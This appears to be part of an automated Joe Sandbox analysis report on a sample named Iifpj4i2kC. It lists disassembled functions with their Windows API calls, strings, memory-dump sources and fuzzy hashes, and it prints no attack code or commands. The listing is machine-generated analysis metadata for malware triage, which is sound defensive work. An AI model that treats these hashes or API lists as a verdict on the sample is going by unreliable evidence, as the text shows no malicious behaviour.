
Function 00007FF67FA46A50 Relevance: 10.7, APIs: 5, Strings: 1, Instructions: 241COMMON

Download Yara Rule

APIs

RaiseFailFastException.KERNEL32(?,?,?,?,?,?,00000000,?,00007FF67FA473A0), ref: 00007FF67FA46B07
RaiseFailFastException.KERNEL32(?,?,?,?,?,?,00000000,?,00007FF67FA473A0), ref: 00007FF67FA46C51
RaiseFailFastException.KERNEL32(?,?,?,?,?,?,00000000,?,00007FF67FA473A0), ref: 00007FF67FA46D33
RaiseFailFastException.KERNEL32(?,?,?,?,?,?,00000000,?,00007FF67FA473A0), ref: 00007FF67FA46D49
RaiseFailFastException.KERNEL32(?,?,?,?,?,?,00000000,?,00007FF67FA473A0), ref: 00007FF67FA46DBE

Strings

[ KeepUnwinding ], xrefs: 00007FF67FA46D5D

Memory Dump Source

Source File: 00000000.00000002.2134602131.00007FF67FA41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF67FA40000, based on PE: true

Associated: 00000000.00000002.2134582345.00007FF67FA40000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2134699848.00007FF67FB29000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2134942464.00007FF67FB5A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2135001038.00007FF67FBC1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2135001038.00007FF67FBC7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2135001038.00007FF67FBCC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2135069156.00007FF67FBCF000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff67fa40000_Iifpj4i2kC.jbxd

Similarity

API ID: ExceptionFailFastRaise
String ID: [ KeepUnwinding ]
API String ID: 2546344036-400895726
Opcode ID: 37b542edfd6e6a04d6d6af4a5e84d7cb03416debfb2b6644f32ce5e3f49ff12d
Instruction ID: 5cfa0414c0a1af25ab2c8e3a67a6bb5819886af0eac01303695cd15b95b0a1ff
Opcode Fuzzy Hash: 37b542edfd6e6a04d6d6af4a5e84d7cb03416debfb2b6644f32ce5e3f49ff12d
Instruction Fuzzy Hash: D1B17DB3A29B42C1EB948F29D481AB973A5FB44F48F184136CE4D8B798DF39E455C390

Function 00007FF67FA7D320 Relevance: 3.3, APIs: 2, Instructions: 326threadCOMMON

Download Yara Rule

APIs

SwitchToThread.KERNEL32 ref: 00007FF67FA7D465
SwitchToThread.KERNEL32 ref: 00007FF67FA7D495

Memory Dump Source

Source File: 00000000.00000002.2134602131.00007FF67FA41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF67FA40000, based on PE: true

Associated: 00000000.00000002.2134582345.00007FF67FA40000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2134699848.00007FF67FB29000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2134942464.00007FF67FB5A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2135001038.00007FF67FBC1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2135001038.00007FF67FBC7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2135001038.00007FF67FBCC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2135069156.00007FF67FBCF000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff67fa40000_Iifpj4i2kC.jbxd

Similarity

API ID: SwitchThread
String ID:
API String ID: 115865932-0
Opcode ID: ddf5a7c59728b91961856a1f3de8d77b860fc2794b24d806c874d2325e124f05
Instruction ID: 647e717ff6b14e52fae22aa9f6ea3b0e70b4694702569438e3efc788f78c8ea0
Opcode Fuzzy Hash: ddf5a7c59728b91961856a1f3de8d77b860fc2794b24d806c874d2325e124f05
Instruction Fuzzy Hash: 60D18F33B28685C6EB608F16D440F6A77A1FB85B94F444636DA9E87788DF3CE441C7A0

Function 00007FF67FA6B6B0 Relevance: 3.3, APIs: 2, Instructions: 303COMMON

Download Yara Rule

APIs

DebugBreak.KERNEL32 ref: 00007FF67FA6B9D2
DebugBreak.KERNEL32 ref: 00007FF67FA6B9E3

Memory Dump Source

Source File: 00000000.00000002.2134602131.00007FF67FA41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF67FA40000, based on PE: true

Associated: 00000000.00000002.2134582345.00007FF67FA40000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2134699848.00007FF67FB29000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2134942464.00007FF67FB5A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2135001038.00007FF67FBC1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2135001038.00007FF67FBC7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2135001038.00007FF67FBCC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2135069156.00007FF67FBCF000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff67fa40000_Iifpj4i2kC.jbxd

Similarity

API ID: BreakDebug
String ID:
API String ID: 456121617-0
Opcode ID: 24780f21546bd015505d40b07dff922e5db3dc92a0b137180c1451863a2d226f
Instruction ID: 365b4c290f86e03713f129209b5a5858587c71608d8db80e67758f4b0e44b611
Opcode Fuzzy Hash: 24780f21546bd015505d40b07dff922e5db3dc92a0b137180c1451863a2d226f
Instruction Fuzzy Hash: 73E1BB73A29B86C6EB109F1DD844A7977A4EB15BD4F100235EA5D873A4EF3CE481C380

Function 00007FF67FA84A40 Relevance: 3.2, APIs: 2, Instructions: 171COMMON

Download Yara Rule

APIs

FlushProcessWriteBuffers.KERNEL32 ref: 00007FF67FA84A78
FlushProcessWriteBuffers.KERNEL32 ref: 00007FF67FA84C8D

Memory Dump Source

Source File: 00000000.00000002.2134602131.00007FF67FA41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF67FA40000, based on PE: true

Associated: 00000000.00000002.2134582345.00007FF67FA40000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2134699848.00007FF67FB29000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2134942464.00007FF67FB5A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2135001038.00007FF67FBC1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2135001038.00007FF67FBC7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2135001038.00007FF67FBCC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2135069156.00007FF67FBCF000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff67fa40000_Iifpj4i2kC.jbxd

Similarity

API ID: BuffersFlushProcessWrite
String ID:
API String ID: 2982998374-0
Opcode ID: 79d0f43756a16d64338861bbba21ee80fd32cc7b8ee7bde5ac8cae3f237e486d
Instruction ID: db64207e544019ef904b8f9f786e1d30b0bb1de2e29f6780f561bd8855e87f71
Opcode Fuzzy Hash: 79d0f43756a16d64338861bbba21ee80fd32cc7b8ee7bde5ac8cae3f237e486d
Instruction Fuzzy Hash: BA5109A3B2C7C1CAFA628A64E404BB95B94EB917C0F598131CE6D87BC1EE7CD940C340

Function 00007FF67FA50470 Relevance: 3.2, APIs: 2, Instructions: 162COMMON

Download Yara Rule

APIs

GetEnabledXStateFeatures.KERNEL32(?,?,?,?,?,00007FF67FA44896,?,?,?,?,?,?,00007FF67FA41EA0), ref: 00007FF67FA50531
GetEnabledXStateFeatures.KERNEL32(?,?,?,?,?,00007FF67FA44896,?,?,?,?,?,?,00007FF67FA41EA0), ref: 00007FF67FA50590

Memory Dump Source

Source File: 00000000.00000002.2134602131.00007FF67FA41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF67FA40000, based on PE: true

Associated: 00000000.00000002.2134582345.00007FF67FA40000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2134699848.00007FF67FB29000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2134942464.00007FF67FB5A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2135001038.00007FF67FBC1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2135001038.00007FF67FBC7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2135001038.00007FF67FBCC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2135069156.00007FF67FBCF000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff67fa40000_Iifpj4i2kC.jbxd

Similarity

API ID: EnabledFeaturesState
String ID:
API String ID: 1557480591-0
Opcode ID: 6a010aaf3d9dfb2ad17c8b6f662b67376a88e00fe7fb95adbc059e65881bfa60
Instruction ID: 0210cf1b1b3a963ea06b4de29fae588a636cedeae095d0a8ee4a0a5ae1c6ff93
Opcode Fuzzy Hash: 6a010aaf3d9dfb2ad17c8b6f662b67376a88e00fe7fb95adbc059e65881bfa60
Instruction Fuzzy Hash: 8E51F533F2C2178AFF6844599499B3943879BE5354F85C538D94ED3AC1EDBFD8824284

Function 00007FF67FA48220 Relevance: 2.1, Strings: 1, Instructions: 834COMMON

Download Yara Rule

Strings

@, xrefs: 00007FF67FA482EE

Memory Dump Source

Source File: 00000000.00000002.2134602131.00007FF67FA41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF67FA40000, based on PE: true

Associated: 00000000.00000002.2134582345.00007FF67FA40000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2134699848.00007FF67FB29000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2134942464.00007FF67FB5A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2135001038.00007FF67FBC1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2135001038.00007FF67FBC7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2135001038.00007FF67FBCC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2135069156.00007FF67FBCF000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff67fa40000_Iifpj4i2kC.jbxd

Similarity

API ID:
String ID: @
API String ID: 0-2766056989
Opcode ID: 6e82094639824c14ab4293de4ec13a988e764ae228435d9a0dabbc53190a5c10
Instruction ID: 565f2ac50868e58261bdd71061b342a24657a9d012d8fd1d0df7f50a17246e91
Opcode Fuzzy Hash: 6e82094639824c14ab4293de4ec13a988e764ae228435d9a0dabbc53190a5c10
Instruction Fuzzy Hash: DD62AFB7A25B0687E7088F2CE455B7937A5FB94B88F158136CA1D83798DF38DA11C780

Function 00007FF67FA6FDD0 Relevance: 1.9, APIs: 1, Instructions: 439COMMON

Download Yara Rule

APIs

Part of subcall function 00007FF67FA50C50: CreateEventW.KERNEL32 ref: 00007FF67FA50C91

Part of subcall function 00007FF67FA51630: QueryPerformanceCounter.KERNEL32 ref: 00007FF67FA51639

DebugBreak.KERNEL32 ref: 00007FF67FA7058A

Memory Dump Source

Source File: 00000000.00000002.2134602131.00007FF67FA41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF67FA40000, based on PE: true

Associated: 00000000.00000002.2134582345.00007FF67FA40000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2134699848.00007FF67FB29000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2134942464.00007FF67FB5A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2135001038.00007FF67FBC1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2135001038.00007FF67FBC7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2135001038.00007FF67FBCC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2135069156.00007FF67FBCF000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff67fa40000_Iifpj4i2kC.jbxd

Similarity

API ID: BreakCounterCreateDebugEventPerformanceQuery
String ID:
API String ID: 4239280443-0
Opcode ID: 5491d3f8da2e797241490e3cda2db23de3b51a53647b4561e21f0ad4d068944b
Instruction ID: 0a61003901fc20bf8927ebd9dd9faca942dc40e31d644dc1dd4a5ba901fc1c28
Opcode Fuzzy Hash: 5491d3f8da2e797241490e3cda2db23de3b51a53647b4561e21f0ad4d068944b
Instruction Fuzzy Hash: 3542F933D29B4285E7008F24BCA4A7637A8FF5AB44F119739D98C92765EF7CA191D380

Function 00007FF67FB07BA0 Relevance: 1.8, APIs: 1, Instructions: 347COMMON

Download Yara Rule

APIs

GetTickCount64.KERNEL32 ref: 00007FF67FB07E0D

Memory Dump Source

Source File: 00000000.00000002.2134602131.00007FF67FA41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF67FA40000, based on PE: true

Associated: 00000000.00000002.2134582345.00007FF67FA40000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2134699848.00007FF67FB29000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2134942464.00007FF67FB5A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2135001038.00007FF67FBC1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2135001038.00007FF67FBC7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2135001038.00007FF67FBCC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2135069156.00007FF67FBCF000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff67fa40000_Iifpj4i2kC.jbxd

Similarity

API ID: Count64Tick
String ID:
API String ID: 1927824332-0
Opcode ID: d7ae4015b6747c4f2a88c3bcd0e3919ab44728c05b91e0697f58cdc10b5d3ecf
Instruction ID: 56175ec4bc5cc46883790ab5b7ce9e2ec01a027f0066fe3cc06530b57060ac1f
Opcode Fuzzy Hash: d7ae4015b6747c4f2a88c3bcd0e3919ab44728c05b91e0697f58cdc10b5d3ecf
Instruction Fuzzy Hash: B4D1CD33B38A4696EB159B25C944ABDA3A1BF41F88F214135DE0EC7691DF7CE881C780

Function 00007FF67FA735C0 Relevance: 1.8, Strings: 1, Instructions: 572COMMON

Download Yara Rule

Strings

, xrefs: 00007FF67FA73B1C

Memory Dump Source

Source File: 00000000.00000002.2134602131.00007FF67FA41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF67FA40000, based on PE: true

Associated: 00000000.00000002.2134582345.00007FF67FA40000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2134699848.00007FF67FB29000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2134942464.00007FF67FB5A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2135001038.00007FF67FBC1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2135001038.00007FF67FBC7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2135001038.00007FF67FBCC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2135069156.00007FF67FBCF000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff67fa40000_Iifpj4i2kC.jbxd

Similarity

API ID:
String ID:
API String ID: 0-3916222277
Opcode ID: cd09ef96d8f17e625544f5d09aacbfbf5b704350f56f2afae0a11c1b875b7772
Instruction ID: 7ffcf78932691d92415737575c91f326679fb61acfb5d9afba8f3f434422a64b
Opcode Fuzzy Hash: cd09ef96d8f17e625544f5d09aacbfbf5b704350f56f2afae0a11c1b875b7772
Instruction Fuzzy Hash: 7C429E33E28B86C6EA108B19E440E7A77A0FB55BA0F454335DA6D87798DF3CE454D390

Function 00007FF67FA69A50 Relevance: 1.7, Strings: 1, Instructions: 490COMMON

Download Yara Rule

Strings

========== ENDGC %d (gen = %lu, collect_classes = %lu) ===========}, xrefs: 00007FF67FA6A256

Memory Dump Source

Source File: 00000000.00000002.2134602131.00007FF67FA41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF67FA40000, based on PE: true

Associated: 00000000.00000002.2134582345.00007FF67FA40000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2134699848.00007FF67FB29000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2134942464.00007FF67FB5A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2135001038.00007FF67FBC1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2135001038.00007FF67FBC7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2135001038.00007FF67FBCC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2135069156.00007FF67FBCF000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff67fa40000_Iifpj4i2kC.jbxd

Similarity

API ID:
String ID: ========== ENDGC %d (gen = %lu, collect_classes = %lu) ===========}
API String ID: 0-2256439813
Opcode ID: 7bd6a443cfe3054721747132375e6f82add6f116c3b8a460bf02874ed9b0fa60
Instruction ID: 371a647f50c64a3445d505a88907102f2143dc6506a52bd8d4aa58732236ac5a
Opcode Fuzzy Hash: 7bd6a443cfe3054721747132375e6f82add6f116c3b8a460bf02874ed9b0fa60
Instruction Fuzzy Hash: 76429E73A29B86CAEA058B29D440B7A77A0FF16F44F144235DA4D87361EF3DE462C380

Function 00007FF67FA5E8A0 Relevance: 1.7, Strings: 1, Instructions: 440COMMON

Download Yara Rule

Strings

?, xrefs: 00007FF67FA5E8EB

Memory Dump Source

Source File: 00000000.00000002.2134602131.00007FF67FA41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF67FA40000, based on PE: true

Associated: 00000000.00000002.2134582345.00007FF67FA40000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2134699848.00007FF67FB29000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2134942464.00007FF67FB5A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2135001038.00007FF67FBC1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2135001038.00007FF67FBC7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2135001038.00007FF67FBCC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2135069156.00007FF67FBCF000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff67fa40000_Iifpj4i2kC.jbxd

Similarity

API ID:
String ID: ?
API String ID: 0-1684325040
Opcode ID: c36884137a1fbdc5629651c62ab30761a03d17dd0682946ebc7bc0764feb72a2
Instruction ID: c3906b4bcbed431ae5087ffa056dfcdaaf909fad616788e757ca724284065b0d
Opcode Fuzzy Hash: c36884137a1fbdc5629651c62ab30761a03d17dd0682946ebc7bc0764feb72a2
Instruction Fuzzy Hash: 1612CF73B28A82C2EA10CB15E484B7A73A5FBA5B94F544632DE5D83794DF3CE481C780

Function 00007FF67FA50030 Relevance: 1.6, APIs: 1, Instructions: 55timeCOMMON

Download Yara Rule

APIs

GetSystemTimeAsFileTime.KERNEL32(?,?,?,00007FF67FA44879,?,?,?,?,?,?,00007FF67FA41EA0), ref: 00007FF67FA500FC

Memory Dump Source

Source File: 00000000.00000002.2134602131.00007FF67FA41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF67FA40000, based on PE: true

Associated: 00000000.00000002.2134582345.00007FF67FA40000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2134699848.00007FF67FB29000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2134942464.00007FF67FB5A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2135001038.00007FF67FBC1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2135001038.00007FF67FBC7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2135001038.00007FF67FBCC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2135069156.00007FF67FBCF000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff67fa40000_Iifpj4i2kC.jbxd

Similarity

API ID: Time$FileSystem
String ID:
API String ID: 2086374402-0
Opcode ID: b5b44fb1cfa246b99875fe13986ad365462ea6fd88d0f75c6747b66273541516
Instruction ID: 745868ccfd8e66d666dafd7ba5700fcf1e02fdabc0f02526e378d9e60a4da657
Opcode Fuzzy Hash: b5b44fb1cfa246b99875fe13986ad365462ea6fd88d0f75c6747b66273541516
Instruction Fuzzy Hash: 61216B32E29B5286E7508B68F851A6A33E0BB89B44F404239E54CC3761EF3CE484C781

Function 00007FF67FA644D0 Relevance: 1.6, Strings: 1, Instructions: 302COMMON

Download Yara Rule

Strings

, xrefs: 00007FF67FA64713

Memory Dump Source

Source File: 00000000.00000002.2134602131.00007FF67FA41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF67FA40000, based on PE: true

Associated: 00000000.00000002.2134582345.00007FF67FA40000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2134699848.00007FF67FB29000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2134942464.00007FF67FB5A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2135001038.00007FF67FBC1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2135001038.00007FF67FBC7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2135001038.00007FF67FBCC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2135069156.00007FF67FBCF000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff67fa40000_Iifpj4i2kC.jbxd

Similarity

API ID: CounterPerformanceQuery
String ID:
API String ID: 2783962273-3916222277
Opcode ID: 0f497518f3011c90386f56ae0dd19987edc3a4fef3325d72aee3a22fc2e24883
Instruction ID: 7066450f5f6211e885dbf8f55f0a0ef07fbdfc94de4613ed6b7c743a5b963b76
Opcode Fuzzy Hash: 0f497518f3011c90386f56ae0dd19987edc3a4fef3325d72aee3a22fc2e24883
Instruction Fuzzy Hash: FFD1D863A2CA42C1EA118B19E550A7977A5FB46FA4F144331EE6D937D4EF3CE451C380

Function 00007FF67FAD9080 Relevance: 1.5, APIs: 1, Instructions: 49COMMON

Download Yara Rule

APIs

GetLocaleInfoEx.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,?), ref: 00007FF67FAD90F0

Memory Dump Source

Source File: 00000000.00000002.2134602131.00007FF67FA41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF67FA40000, based on PE: true

Associated: 00000000.00000002.2134582345.00007FF67FA40000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2134699848.00007FF67FB29000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2134942464.00007FF67FB5A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2135001038.00007FF67FBC1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2135001038.00007FF67FBC7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2135001038.00007FF67FBCC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2135069156.00007FF67FBCF000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff67fa40000_Iifpj4i2kC.jbxd

Similarity

API ID: InfoLocale
String ID:
API String ID: 2299586839-0
Opcode ID: 631e051c7e85c708eee405e58e5ac8c33c0e023327227dff62814852cabaa958
Instruction ID: 1eaf8376416dad385af901d94819f5d13a4495db1aff35655b18d02b8cb09142
Opcode Fuzzy Hash: 631e051c7e85c708eee405e58e5ac8c33c0e023327227dff62814852cabaa958
Instruction Fuzzy Hash: D9011533F14660DDF761DBA5AC40AED3BB5BB4836CF60402ADE0CA6A48DE349496C740

Function 00007FF67FA49430 Relevance: 1.0, Instructions: 971COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2134602131.00007FF67FA41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF67FA40000, based on PE: true

Associated: 00000000.00000002.2134582345.00007FF67FA40000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2134699848.00007FF67FB29000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2134942464.00007FF67FB5A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2135001038.00007FF67FBC1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2135001038.00007FF67FBC7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2135001038.00007FF67FBCC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2135069156.00007FF67FBCF000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff67fa40000_Iifpj4i2kC.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3fa54e4b404b83b64a3ef684d3fa7d9e7b579a293c5d3786dac23140140fd01d
Instruction ID: a7d93b1dee95bd89c43f4e1d847ec50126de31960cabbee0562b97efbe2501fa
Opcode Fuzzy Hash: 3fa54e4b404b83b64a3ef684d3fa7d9e7b579a293c5d3786dac23140140fd01d
Instruction Fuzzy Hash: 3E82BFB3A2878587EB148F19E580AB977A1FB98780F048135DB5E87B84DF3DE564C780

Function 00007FF67FA74390 Relevance: 1.0, Instructions: 955COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2134602131.00007FF67FA41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF67FA40000, based on PE: true

Associated: 00000000.00000002.2134582345.00007FF67FA40000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2134699848.00007FF67FB29000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2134942464.00007FF67FB5A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2135001038.00007FF67FBC1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2135001038.00007FF67FBC7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2135001038.00007FF67FBCC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2135069156.00007FF67FBCF000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff67fa40000_Iifpj4i2kC.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c44773253abac8336c1d72ee043a06f130369fffe4656ea49cf70b632554c591
Instruction ID: bc022a107864da10093e9d906143ee1b4da4054bee13bbb4f55e4f28e7a17670
Opcode Fuzzy Hash: c44773253abac8336c1d72ee043a06f130369fffe4656ea49cf70b632554c591
Instruction Fuzzy Hash: 3B92AC63A3CA46C5EA019B65A850EB6A3A5BF4AFC4F484236DD0ED3765DF3CE441C390

Function 00007FF67FA792CE Relevance: .8, Instructions: 844COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2134602131.00007FF67FA41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF67FA40000, based on PE: true

Associated: 00000000.00000002.2134582345.00007FF67FA40000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2134699848.00007FF67FB29000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2134942464.00007FF67FB5A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2135001038.00007FF67FBC1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2135001038.00007FF67FBC7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2135001038.00007FF67FBCC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2135069156.00007FF67FBCF000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff67fa40000_Iifpj4i2kC.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f1e24ba0ba6bef78217b93cc1824f39f4ffccc09ca148982d560d43c4ab6c4d9
